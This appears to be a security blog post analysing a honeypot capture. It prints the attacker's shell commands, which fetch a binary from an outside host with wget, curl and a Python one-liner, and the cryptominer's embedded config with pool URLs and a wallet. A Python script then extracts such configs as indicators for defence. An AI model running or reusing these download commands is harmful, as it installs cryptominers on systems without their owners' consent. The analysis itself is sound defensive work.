Another honeypot entry caught my eye. First, the attack
itself was unusual because the malware download was executed
by a small Python one-liner instead of just running wget or curl:
uname -a
rm -f /tmp/run
if [ `getconf LONG_BIT` -eq 64 ]
then u="http://www.bizqsoft.com/tp2/r6.log"
else u="http://www.bizqsoft.com/tp2/r.log"
fi
wget -O /tmp/run
curl -o /tmp/run
python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')"
Looking into the downloaded binary, one finds a miner for
the cryptocurrency "sumokoin" using the "cryptonight" algorithm; its embedded configuration reads:
{
  "algo": "cryptonight",
  "av": 0,
  "background": false,
  "colors": true,
  "cpu-affinity": null,
  "cpu-priority": null,
  "donate-level": 5,
  "log-file": null,
  "max-cpu-usage": 75,
  "print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "safe": false,
  "syslog": false,
  "threads": null,
  "pools": [
    {
      "url": "pool.sumokoin.hashvault.pro:80",
      "user": "Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon",
      "pass": "x86_64",
      "keepalive": true,
      "nicehash": false
    },
    {
      "url": "pool.sumokoin.com:3333",
      "user": "Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon",
      "pass": "x86_64",
      "keepalive": true,
      "nicehash": false
    },
  ],
  "api": {
    "port": 0,
    "access-token": null,
    "worker-id": null
  }
}
(see https://coinmarketcap.com/currencies/sumokoin/)
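Pulling the pool URLs and wallet out of such a sample can be automated: the script below is an added example (not from the original post) that scans a binary blob for an embedded miner config of the shape shown above, tolerates the trailing comma before "]" that strict JSON parsers reject, and returns the algo, pool URLs and wallets for triage. The blob, pool name and wallet value are constructed placeholders.

```python
import json
import re

# Constructed sample "binary": an ELF-like header, an embedded miner config in the
# same shape as the one found in the honeypot sample, and some trailing junk bytes.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 16
    + b'{"algo":"cryptonight","av":0,"donate-level":5,"max-cpu-usage":75,"threads":null,'
    b'"pools":[{"url":"pool.example.invalid:3333","user":"WALLET_PLACEHOLDER","pass":"x86_64",'
    b'"keepalive":true,"nicehash":false},],"api":{"port":0,"access-token":null}}'
    + b"\xde\xad\xbe\xef" * 8
)

# Matches a comma that is directly followed by a closing bracket or brace.
TRAILING_COMMA = re.compile(rb",\s*([\]}])")

def find_json_objects(blob: bytes):
    """Yield each brace-balanced object in blob that starts with {"algo"."""
    for m in re.finditer(rb'\{"algo"', blob):
        depth, start = 0, m.start()
        for i in range(start, len(blob)):
            c = blob[i:i + 1]
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
                if depth == 0:
                    yield blob[start:i + 1]
                    break

def parse_config(raw: bytes):
    """Parse a miner config, first removing trailing commas like "},]"."""
    cleaned = TRAILING_COMMA.sub(rb"\1", raw)
    try:
        return json.loads(cleaned.decode("utf-8", errors="replace"))
    except json.JSONDecodeError:
        return None

def extract_miner_configs(blob: bytes):
    """Return one summary dict (algo, pool URLs, wallets, CPU cap) per config found."""
    found = []
    for raw in find_json_objects(blob):
        cfg = parse_config(raw)
        if not cfg or "pools" not in cfg:
            continue
        pools = [p for p in (cfg.get("pools") or []) if isinstance(p, dict)]
        found.append({
            "algo": cfg.get("algo"),
            "pool_urls": [p.get("url") for p in pools],
            "wallets": sorted({p["user"] for p in pools if p.get("user")}),
            "max_cpu_usage": cfg.get("max-cpu-usage"),
        })
    return found
```

The pool hostnames and wallet strings it returns are the indicators worth feeding into DNS and proxy logs to spot other infected hosts.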
Looking into the blockchain explorer, I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin...